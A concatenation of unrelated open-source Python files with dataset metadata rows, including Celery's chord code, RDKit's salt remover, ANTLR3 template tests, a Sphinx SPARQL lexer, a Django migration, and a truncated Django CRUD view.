The header is a group of tasks that must complete before the callback is
called. A chord is essentially a callback for a group of tasks.
The body is applied with the return values of all the header
tasks as a list.
Example:
The chord:
.. code-block:: pycon
>>> res = chord([add.s(2, 2), add.s(4, 4)])(sum_task.s())
is effectively :math:`\Sigma ((2 + 2) + (4 + 4))`:
.. code-block:: pycon
>>> res.get()
12
"""
@classmethod
def from_dict(cls, d, app=None):
args, d['kwargs'] = cls._unpack_args(**d['kwargs'])
return _upgrade(d, cls(*args, app=app, **d))
@staticmethod
def _unpack_args(header=None, body=None, **kwargs):
# Python signatures are better at extracting keys from dicts
# than manually popping things off.
return (header, body), kwargs
def __init__(self, header, body=None, task='celery.chord',
args=(), kwargs={}, app=None, **options):
Signature.__init__(
self, task, args,
dict(kwargs=kwargs, header=_maybe_group(header, app),
body=maybe_signature(body, app=app)), app=app, **options
)
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
return self.apply_async((), {'body': body} if body else {}, **options)
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
if not isinstance(self.tasks, group):
self.tasks = group(self.tasks, app=self.app)
header_result = self.tasks.freeze(
parent_id=parent_id, root_id=root_id, chord=self.body)
bodyres = self.body.freeze(_id, root_id=root_id)
# we need to link the body result back to the group result,
# but the body may actually be a chain,
# so find the first result without a parent
node = bodyres
seen = set()
while node:
if node.id in seen:
raise RuntimeError('Recursive result parents')
seen.add(node.id)
if node.parent is None:
node.parent = header_result
break
node = node.parent
self.id = self.tasks.id
return bodyres
def apply_async(self, args=(), kwargs={}, task_id=None,
producer=None, publisher=None, connection=None,
router=None, result_cls=None, **options):
kwargs = kwargs or {}
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
body = kwargs.pop('body', None) or self.kwargs['body']
kwargs = dict(self.kwargs['kwargs'], **kwargs)
body = body.clone(**options)
app = self._get_app(body)
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=app))
if app.conf.task_always_eager:
return self.apply(args, kwargs,
body=body, task_id=task_id, **options)
if len(self.tasks) == 1:
# chord([A], B) can be optimized as A | B
# - Issue #3323
return (self.tasks[0] | body).set(task_id=task_id).apply_async(
args, kwargs, **options)
# chord([A, B, ...], C)
return self.run(tasks, body, args, task_id=task_id, **options)
def apply(self, args=(), kwargs={}, propagate=True, body=None, **options):
body = self.body if body is None else body
tasks = (self.tasks.clone() if isinstance(self.tasks, group)
else group(self.tasks, app=self.app))
return body.apply(
args=(tasks.apply(args, kwargs).get(propagate=propagate),),
)
def _traverse_tasks(self, tasks, value=None):
stack = deque(list(tasks))
while stack:
task = stack.popleft()
if isinstance(task, group):
stack.extend(task.tasks)
else:
yield task if value is None else value
def __length_hint__(self):
return sum(self._traverse_tasks(self.tasks, 1))
def run(self, header, body, partial_args, app=None, interval=None,
countdown=1, max_retries=None, eager=False,
task_id=None, **options):
app = app or self._get_app(body)
group_id = header.options.get('task_id') or uuid()
root_id = body.options.get('root_id')
body.chord_size = self.__length_hint__()
options = dict(self.options, **options) if options else self.options
if options:
options.pop('task_id', None)
body.options.update(options)
results = header.freeze(
group_id=group_id, chord=body, root_id=root_id).results
bodyres = body.freeze(task_id, root_id=root_id)
parent = app.backend.apply_chord(
header, partial_args, group_id, body,
interval=interval, countdown=countdown,
options=options, max_retries=max_retries,
result=results)
bodyres.parent = parent
return bodyres
def clone(self, *args, **kwargs):
s = Signature.clone(self, *args, **kwargs)
# need to make copy of body
try:
s.kwargs['body'] = maybe_signature(s.kwargs['body'], clone=True)
except (AttributeError, KeyError):
pass
return s
def link(self, callback):
self.body.link(callback)
return callback
def link_error(self, errback):
self.body.link_error(errback)
return errback
def set_immutable(self, immutable):
# changes mutability of header only, not callback.
for task in self.tasks:
task.set_immutable(immutable)
def __repr__(self):
if self.body:
if isinstance(self.body, _chain):
return remove_repeating_from_task(
self.body.tasks[0]['task'],
'%({0} | {1!r})'.format(
self.body.tasks[0].reprcall(self.tasks),
chain(self.body.tasks[1:], app=self._app),
),
)
return '%' + remove_repeating_from_task(
self.body['task'], self.body.reprcall(self.tasks))
return '<chord without body: {0.tasks!r}>'.format(self)
@cached_property
def app(self):
return self._get_app(self.body)
def _get_app(self, body=None):
app = self._app
if app is None:
try:
tasks = self.tasks.tasks # is a group
except AttributeError:
tasks = self.tasks
app = tasks[0]._app
if app is None and body is not None:
app = body._app
return app if app is not None else current_app
tasks = getitem_property('kwargs.header', 'Tasks in chord header.')
body = getitem_property('kwargs.body', 'Body task of chord.')
def signature(varies, *args, **kwargs):
"""Create new signature.
- if the first argument is a signature already then it's cloned.
- if the first argument is a dict, then a Signature version is returned.
Returns:
Signature: The resulting signature.
"""
app = kwargs.get('app')
if isinstance(varies, dict):
if isinstance(varies, abstract.CallableSignature):
return varies.clone()
return Signature.from_dict(varies, app=app)
return Signature(varies, *args, **kwargs)
subtask = signature # noqa: E305 XXX compat
def maybe_signature(d, app=None, clone=False):
"""Ensure obj is a signature, or None.
Arguments:
d (Optional[Union[abstract.CallableSignature, Mapping]]):
Signature or dict-serialized signature.
app (celery.Celery):
App to bind signature to.
clone (bool):
If d' is already a signature, the signature
will be cloned when this flag is enabled.
Returns:
Optional[abstract.CallableSignature]
"""
if d is not None:
if isinstance(d, abstract.CallableSignature):
if clone:
d = d.clone()
elif isinstance(d, dict):
d = signature(d)
if app is not None:
d._app = app
return d
maybe_subtask = maybe_signature # noqa: E305 XXX compat
| gpl-3.0 | -1,338,796,040,118,273,500 | 34.671942 | 79 | 0.558406 | false | 4.071605 | false | false | false |
rvianello/rdkit | rdkit/Chem/SaltRemover.py | 2 | 9561 | #
# Copyright (c) 2010, Novartis Institutes for BioMedical Research Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Novartis Institutes for BioMedical Research Inc.
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Created by Greg Landrum, Dec 2006
#
import os
import re
from collections import namedtuple
from contextlib import closing
from rdkit import Chem, RDConfig
from rdkit.Chem.rdmolfiles import SDMolSupplier, SmilesMolSupplier
class InputFormat:
SMARTS = 'smarts'
MOL = 'mol'
SMILES = 'smiles'
def _smartsFromSmartsLine(line):
"""
Converts given line into a molecule using 'Chem.MolFromSmarts'.
"""
# Name the regular expression (better than inlining it)
whitespace = re.compile(r'[\t ]+')
# Reflects the specialisation of this method to read the rather unusual
# SMARTS files with the // comments.
line = line.strip().split('//')[0]
if line:
smarts = whitespace.split(line)
salt = Chem.MolFromSmarts(smarts[0])
if salt is None:
raise ValueError(line)
return salt
def _getSmartsSaltsFromStream(stream):
"""
Yields extracted SMARTS salts from given stream.
"""
with closing(stream) as lines:
for line in lines:
smarts = _smartsFromSmartsLine(line)
if smarts:
yield smarts
def _getSmartsSaltsFromFile(filename):
"""
Extracts SMARTS salts from given file object.
"""
return _getSmartsSaltsFromStream(open(filename, 'r'))
class SaltRemover(object):
defnFilename = os.path.join(RDConfig.RDDataDir, 'Salts.txt')
def __init__(self, defnFilename=None, defnData=None, defnFormat=InputFormat.SMARTS):
if defnFilename:
self.defnFilename = defnFilename
self.defnData = defnData
self.salts = None
self.defnFormat = defnFormat
self._initPatterns()
def _initPatterns(self):
"""
>>> remover = SaltRemover()
>>> len(remover.salts)>0
True
Default input format is SMARTS
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> remover = SaltRemover(defnData="[Na+]\\nCC(=O)O", defnFormat=InputFormat.SMILES)
>>> len(remover.salts)
2
>>> from rdkit import RDLogger
>>> RDLogger.DisableLog('rdApp.error')
>>> remover = SaltRemover(defnData="[Cl,fail]")
Traceback (most recent call last):
...
ValueError: [Cl,fail]
>>> RDLogger.EnableLog('rdApp.error')
"""
if self.defnData:
from rdkit.six.moves import cStringIO as StringIO
inF = StringIO(self.defnData)
with closing(inF):
self.salts = []
for line in inF:
if line:
if self.defnFormat == InputFormat.SMARTS:
salt = _smartsFromSmartsLine(line)
elif self.defnFormat == InputFormat.SMILES:
salt = Chem.MolFromSmiles(line)
else:
raise ValueError('Unsupported format for supplier.')
if salt is None:
raise ValueError(line)
self.salts.append(salt)
else:
if self.defnFormat == InputFormat.SMARTS:
self.salts = [mol for mol in _getSmartsSaltsFromFile(self.defnFilename)]
elif self.defnFormat == InputFormat.MOL:
self.salts = [mol for mol in SDMolSupplier(self.defnFilename)]
elif self.defnFormat == InputFormat.SMILES:
self.salts = [mol for mol in SmilesMolSupplier(self.defnFilename)]
else:
raise ValueError('Unsupported format for supplier.')
def StripMol(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover.StripMol(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
Notice that all salts are removed:
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl.Br')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Matching (e.g. "salt-like") atoms in the molecule are unchanged:
>>> mol = Chem.MolFromSmiles('CN(Br)Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
>>> mol = Chem.MolFromSmiles('CN(Br)Cl.Cl')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Charged salts are handled reasonably:
>>> mol = Chem.MolFromSmiles('C[NH+](C)(C).[Cl-]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
4
Watch out for this case (everything removed):
>>> remover = SaltRemover()
>>> len(remover.salts)>1
True
>>> mol = Chem.MolFromSmiles('CC(=O)O.[Na]')
>>> res = remover.StripMol(mol)
>>> res.GetNumAtoms()
0
dontRemoveEverything helps with this by leaving the last salt:
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
4
but in cases where the last salts are the same, it can't choose
between them, so it returns all of them:
>>> mol = Chem.MolFromSmiles('Cl.Cl')
>>> res = remover.StripMol(mol,dontRemoveEverything=True)
>>> res.GetNumAtoms()
2
"""
strippedMol = self._StripMol(mol, dontRemoveEverything)
return strippedMol.mol
def StripMolWithDeleted(self, mol, dontRemoveEverything=False):
"""
Strips given molecule and returns it, with the fragments which have been deleted.
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Br')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> Chem.MolToSmiles(res)
'CN(C)C'
>>> [Chem.MolToSmarts(m) for m in deleted]
['[Cl,Br]']
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res, deleted = remover.StripMolWithDeleted(mol)
>>> res.GetNumAtoms()
4
>>> len(deleted)
1
>>> deleted[0].GetNumAtoms()
1
>>> Chem.MolToSmiles(deleted[0])
'Cl'
Multiple occurrences of 'Cl' and without tuple destructuring
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl.Cl')
>>> tup = remover.StripMolWithDeleted(mol)
>>> tup.mol.GetNumAtoms()
4
>>> len(tup.deleted)
1
>>> tup.deleted[0].GetNumAtoms()
1
>>> Chem.MolToSmiles(deleted[0])
'Cl'
"""
return self._StripMol(mol, dontRemoveEverything)
def _StripMol(self, mol, dontRemoveEverything=False):
def _applyPattern(m, salt, notEverything):
nAts = m.GetNumAtoms()
if not nAts:
return m
res = m
t = Chem.DeleteSubstructs(res, salt, True)
if not t or (notEverything and t.GetNumAtoms() == 0):
return res
res = t
while res.GetNumAtoms() and nAts > res.GetNumAtoms():
nAts = res.GetNumAtoms()
t = Chem.DeleteSubstructs(res, salt, True)
if notEverything and t.GetNumAtoms() == 0:
break
res = t
return res
StrippedMol = namedtuple('StrippedMol', ['mol', 'deleted'])
deleted = []
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
return StrippedMol(mol, deleted)
modified = False
natoms = mol.GetNumAtoms()
for salt in self.salts:
mol = _applyPattern(mol, salt, dontRemoveEverything)
if natoms != mol.GetNumAtoms():
natoms = mol.GetNumAtoms()
modified = True
deleted.append(salt)
if dontRemoveEverything and len(Chem.GetMolFrags(mol)) <= 1:
break
if modified and mol.GetNumAtoms() > 0:
Chem.SanitizeMol(mol)
return StrippedMol(mol, deleted)
def __call__(self, mol, dontRemoveEverything=False):
"""
>>> remover = SaltRemover(defnData="[Cl,Br]")
>>> len(remover.salts)
1
>>> Chem.MolToSmiles(remover.salts[0])
'Cl'
>>> mol = Chem.MolFromSmiles('CN(C)C.Cl')
>>> res = remover(mol)
>>> res is not None
True
>>> res.GetNumAtoms()
4
"""
return self.StripMol(mol, dontRemoveEverything=dontRemoveEverything)
# ------------------------------------
#
# doctest boilerplate
#
def _runDoctests(verbose=None): # pragma: nocover
import sys
import doctest
failed, _ = doctest.testmod(optionflags=doctest.ELLIPSIS, verbose=verbose)
sys.exit(failed)
if __name__ == '__main__': # pragma: nocover
_runDoctests()
| bsd-3-clause | 8,806,758,668,487,101,000 | 29.449045 | 88 | 0.65035 | false | 3.385623 | true | false | false |
africallshop/africallshop-iphone | submodules/externals/antlr3/runtime/Python/tests/t055templates.py | 16 | 11976 | import unittest
import textwrap
import antlr3
import antlr3.tree
import stringtemplate3
import testbase
import sys
import os
from StringIO import StringIO
class T(testbase.ANTLRTest):
def execParser(self, grammar, grammarEntry, input, group=None):
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = parserCls(tStream)
if group is not None:
parser.templateLib = group
result = getattr(parser, grammarEntry)()
if result.st is not None:
return result.st.toString()
return None
def testInlineTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testExternalTemplate(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T2;
options {
language=Python;
output=template;
}
a : r+=arg OP r+=arg
-> expr(op={$OP.text}, args={$r})
;
arg: ID -> template(t={$ID.text}) "<t>";
ID : 'a'..'z'+;
OP: '+';
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"a + b",
group
)
self.failUnlessEqual("[a+b]", found)
def testEmptyTemplate(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a : ID INT
->
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnless(found is None)
def testList(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: (r+=b)* EOF
-> template(r={$r})
"<r; separator=\",\">"
;
b: ID
-> template(t={$ID.text}) "<t>"
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc def ghi"
)
self.failUnlessEqual("abc,def,ghi", found)
def testAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
-> { stringtemplate3.StringTemplate("hello") }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{ $st = %{"hello"} }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello", found)
def testTemplateExpressionInAction2(self):
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
res = %{"hello <foo>"}
%res.foo = "world";
}
-> { res }
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc"
)
self.failUnlessEqual("hello world", found)
def testIndirectTemplateConstructor(self):
templates = textwrap.dedent(
'''\
group T;
expr(args, op) ::= <<
[<args; separator={<op>}>]
>>
'''
)
group = stringtemplate3.StringTemplateGroup(
file=StringIO(templates),
lexer='angle-bracket'
)
grammar = textwrap.dedent(
r'''grammar T;
options {
language=Python;
output=template;
}
a: ID
{
$st = %({"expr"})(args={[1, 2, 3]}, op={"+"})
}
;
ID : 'a'..'z'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc",
group
)
self.failUnlessEqual("[1+2+3]", found)
def testPredicates(self):
grammar = textwrap.dedent(
r'''grammar T3;
options {
language=Python;
output=template;
}
a : ID INT
-> {$ID.text=='a'}? template(int={$INT.text})
"A: <int>"
-> {$ID.text=='b'}? template(int={$INT.text})
"B: <int>"
-> template(int={$INT.text})
"C: <int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"b 34"
)
self.failUnlessEqual("B: 34", found)
def testBacktrackingMode(self):
grammar = textwrap.dedent(
r'''grammar T4;
options {
language=Python;
output=template;
backtrack=true;
}
a : (ID INT)=> ID INT
-> template(id={$ID.text}, int={$INT.text})
"id=<id>, int=<int>"
;
ID : 'a'..'z'+;
INT : '0'..'9'+;
WS : (' '|'\n') {$channel=HIDDEN;} ;
'''
)
found = self.execParser(
grammar, 'a',
"abc 34"
)
self.failUnlessEqual("id=abc, int=34", found)
def testRewrite(self):
grammar = textwrap.dedent(
r'''grammar T5;
options {
language=Python;
output=template;
rewrite=true;
}
prog: stat+;
stat
: 'if' '(' expr ')' stat
| 'return' return_expr ';'
| '{' stat* '}'
| ID '=' expr ';'
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
result = parser.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
def testTreeRewrite(self):
grammar = textwrap.dedent(
r'''grammar T6;
options {
language=Python;
output=AST;
}
tokens {
BLOCK;
ASSIGN;
}
prog: stat+;
stat
: IF '(' e=expr ')' s=stat
-> ^(IF $e $s)
| RETURN expr ';'
-> ^(RETURN expr)
| '{' stat* '}'
-> ^(BLOCK stat*)
| ID '=' expr ';'
-> ^(ASSIGN ID expr)
;
expr
: ID
| INT
;
IF: 'if';
RETURN: 'return';
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
)
treeGrammar = textwrap.dedent(
r'''tree grammar T6Walker;
options {
language=Python;
tokenVocab=T6;
ASTLabelType=CommonTree;
output=template;
rewrite=true;
}
prog: stat+;
stat
: ^(IF expr stat)
| ^(RETURN return_expr)
| ^(BLOCK stat*)
| ^(ASSIGN ID expr)
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
'''
)
input = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
)
lexerCls, parserCls = self.compileInlineGrammar(grammar)
walkerCls = self.compileInlineGrammar(treeGrammar)
cStream = antlr3.StringStream(input)
lexer = lexerCls(cStream)
tStream = antlr3.TokenRewriteStream(lexer)
parser = parserCls(tStream)
tree = parser.prog().tree
nodes = antlr3.tree.CommonTreeNodeStream(tree)
nodes.setTokenStream(tStream)
walker = walkerCls(nodes)
walker.prog()
found = tStream.toString()
expected = textwrap.dedent(
'''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
)
self.failUnlessEqual(expected, found)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -1,143,290,094,031,287,800 | 22.574803 | 84 | 0.373079 | false | 4.388421 | true | false | false |
ktbs/ktbs | doc/ext/sparqllexer.py | 1 | 2068 | # -*- coding: utf-8 -*-
"""
sparqllexer
~~~~~~~~~~~
Extension to add a sparql lexer to Sphinx.
``http://sphinx.pocoo.org/ext/appapi.html?highlight=pygments#sphinx.application.Sphinx.add%5Flexer``
It uses the Kier Davis code: ``https://github.com/kierdavis/SparqlLexer``.
.. code-block:: sparql
Sparql example TODO
changelog
`````````
2013-21-21: pchampin: added incomplete support for functions
2012-11-27: pchampin: improved a number of token definition
"""
from pygments.lexer import RegexLexer, bygroups
from pygments.formatter import Formatter
from pygments.token import *
PREFIX = r"[a-zA-Z][-_a-zA-Z0-9]*"
NAME = r"[_a-zA-Z][-_a-zA-Z0-9]*"
class SparqlLexer(RegexLexer):
name = "Sparql"
aliases = ["sparql", "ttl"]
filenames = ["*.ttl"]
alias_filenames = ["*.txt"]
mimetypes = ["text/x-sparql", "text/sparql", "application/sparql"]
tokens = {
"root": [
(r"#.*\n", Comment.Single),
(r",|;|\.|\(|\)|\[|\]|\{|\}|\^\^", Punctuation),
("(%s)?\:(%s)?" % (PREFIX, NAME), Name.Tag),
(r"_\:%s" % NAME, Name.Variable),
(r"[\$\?]%s" % NAME, Name.Variable),
(r"<[^>]*>", Name.Constant),
(r"(['\"]).+\1", String.Double),
(r"\d+(\.\d*)?([eE][+\-]?\d+)?", Number),
(r"\.\d+([eE][+\-]?\d+)?", Number),
(r"\s+", Whitespace),
(r"true|false", Keyword.Constant),
(r"(?i)prefix|select|construct|ask|describe|where|from|as|graph|filter"
"|optional|a|union|not exists", Keyword.Reserved),
(r"(?i)distinct|reduced|group by|order by|limit|offset|asc|desc",
Keyword.Reserved),
(r"(?i)count|sum|avg|min|max|groupconcat|sample",
Keyword.Reserved),
(r"(?i)delete|insert|data|load|clear|create|drop|copy|move|add",
Keyword.Reserved),
(r"(?i)regex",
Keyword.Function),
(r"\+|-|\*|/|=|!|<|>|\&|\|", Punctuation),
(r".+", Error),
],
}
def setup(app):
# An instance of the lexer is required
sparqlLexer = SparqlLexer()
app.add_lexer('sparql', sparqlLexer)
| lgpl-3.0 | 289,398,559,870,036,500 | 28.971014 | 104 | 0.567215 | false | 3.005814 | false | false | false |
ddanier/django_price | django_price/migrations/0001_initial.py | 1 | 1972 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tax',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=25)),
('created', models.DateTimeField(default=datetime.datetime.now, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LinearTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
('percent', models.DecimalField(max_digits=6, decimal_places=3)),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.CreateModel(
name='MultiTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.AddField(
model_name='tax',
name='_poly_ct',
field=models.ForeignKey(related_name='+', editable=False, to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='multitax',
name='taxes',
field=models.ManyToManyField(related_name='+', to='django_price.Tax'),
),
] | bsd-3-clause | 4,126,624,790,270,327,000 | 34.232143 | 145 | 0.525355 | false | 4.650943 | false | false | false |
MERegistro/meregistro | meregistro/apps/backend/views/crud.py | 1 | 6613 | # -*- coding: UTF-8 -*-
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from meregistro.shortcuts import my_render
from apps.seguridad.decorators import login_required, credential_required
from django.core.paginator import Paginator
class CrudConfig:
def __init__(self, model_class, form_class, form_filter_class, template_dir):
self.model_class = model_class
self.form_class = form_class
self.form_filter_class = form_filter_class
self.template_dir = template_dir
from apps.registro.models import AutoridadCargo
from apps.registro.forms import AutoridadCargoForm, AutoridadCargoFormFilters
from apps.registro.models import Departamento
from apps.registro.forms import DepartamentoForm, DepartamentoFormFilters
from apps.registro.models import Localidad
from apps.registro.forms import LocalidadForm, LocalidadFormFilters
from apps.registro.models import Jurisdiccion
from apps.registro.forms import JurisdiccionForm, JurisdiccionFormFilters
from apps.registro.models import TipoGestion
from apps.registro.forms import TipoGestionForm, TipoGestionFormFilters
from apps.registro.models import TipoSubsidio
from apps.registro.forms import TipoSubsidioForm, TipoSubsidioFormFilters
from apps.registro.models import OrigenNorma
from apps.registro.forms import OrigenNormaForm, OrigenNormaFormFilters
from apps.registro.models import TipoNorma
from apps.registro.forms import TipoNormaForm, TipoNormaFormFilters
from apps.registro.models import TipoDomicilio
from apps.registro.forms import TipoDomicilioForm, TipoDomicilioFormFilters
from apps.registro.models import TipoCompartido
from apps.registro.forms import TipoCompartidoForm, TipoCompartidoFormFilters
from apps.registro.models import TipoConexion
from apps.registro.forms import TipoConexionForm, TipoConexionFormFilters
from apps.registro.models import TipoDependenciaFuncional
from apps.registro.forms import TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters
from apps.titulos.models import Carrera
from apps.titulos.forms import CarreraForm, CarreraFormFilters
from apps.titulos.models import TipoTitulo
from apps.titulos.forms import TipoTituloForm, TipoTituloFormFilters
cruds = {
'autoridad_cargo': CrudConfig(AutoridadCargo, AutoridadCargoForm, AutoridadCargoFormFilters, 'backend/autoridad_cargo/'),
'departamento': CrudConfig(Departamento, DepartamentoForm, DepartamentoFormFilters, 'backend/departamento/'),
'localidad': CrudConfig(Localidad, LocalidadForm, LocalidadFormFilters, 'backend/localidad/'),
'jurisdiccion': CrudConfig(Jurisdiccion, JurisdiccionForm, JurisdiccionFormFilters, 'backend/jurisdiccion/'),
'tipo_gestion': CrudConfig(TipoGestion, TipoGestionForm, TipoGestionFormFilters, 'backend/tipo_gestion/'),
'tipo_subsidio': CrudConfig(TipoSubsidio, TipoSubsidioForm, TipoSubsidioFormFilters, 'backend/tipo_subsidio/'),
'origen_norma': CrudConfig(OrigenNorma, OrigenNormaForm, OrigenNormaFormFilters, 'backend/origen_norma/'),
'tipo_norma': CrudConfig(TipoNorma, TipoNormaForm, TipoNormaFormFilters, 'backend/tipo_norma/'),
'tipo_domicilio': CrudConfig(TipoDomicilio, TipoDomicilioForm, TipoDomicilioFormFilters, 'backend/tipo_domicilio/'),
'tipo_compartido': CrudConfig(TipoCompartido, TipoCompartidoForm, TipoCompartidoFormFilters, 'backend/tipo_compartido/'),
'tipo_conexion': CrudConfig(TipoConexion, TipoConexionForm, TipoConexionFormFilters, 'backend/tipo_conexion/'),
'tipo_dependencia_funcional': CrudConfig(TipoDependenciaFuncional, TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters, 'backend/tipo_dependencia_funcional/'),
'carrera': CrudConfig(Carrera, CarreraForm, CarreraFormFilters, 'backend/carrera/'),
'tipo_titulo': CrudConfig(TipoTitulo, TipoTituloForm, TipoTituloFormFilters, 'backend/tipo_titulo/'),
}
ITEMS_PER_PAGE = 50
@credential_required('seg_backend')
def index(request, crud_name):
config = cruds[crud_name]
if request.method == 'GET':
